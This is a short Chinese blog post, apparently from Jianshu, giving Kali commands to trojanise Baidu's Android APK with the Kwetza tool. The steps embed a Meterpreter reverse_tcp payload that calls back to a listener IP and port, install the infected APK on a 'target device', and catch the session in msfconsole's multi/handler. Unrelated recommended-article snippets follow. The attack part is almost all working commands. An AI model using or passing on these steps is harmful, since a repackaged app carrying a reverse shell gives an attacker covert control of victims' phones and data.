kali下Kwetza进行安卓APK文件恶意注入

参考：https://www.youtube.com/watch?v=sP8CtMPAwzY
https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

cd /tmp
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

最后编辑于：2017.12.10 01:18:16

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

Android - 收藏集
Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
passiontim阅读 175,633评论 25赞 709
awesome-android
afinalAfinal是一个android的ioc，orm框架 https://github.com/yangf...
passiontim阅读 15,692评论 2赞 45

原来劳动工作者不注重锻炼会带来这样潜在危害
部分人认为，从事体力劳动的人筋骨天天在活动，因此就不需要再进行身体锻炼了。这种看法难免失之偏颇。体力劳动的动作比...
李白爱健身阅读 3,297评论 1赞 0
现状
最近想的事情越来越多，压力越来越大，担心自己的身体会出什么状况，不是怕死，而是担心真有什么事了连累了家人。虽然买了...
一只柠檬味的猫阅读 1,085评论 0赞 0
带个不哭不闹的孩子出门是一种怎么样的体验
想必，有孩子的家长一定知道，出门在外，还带着孩子，是怎样的一种残酷体验。除了要照顾他吃喝拉撒，走不动了就得抱，不...
宠爱by阅读 3,203评论 0赞 0

3赞4赞

赞赏

手机看全文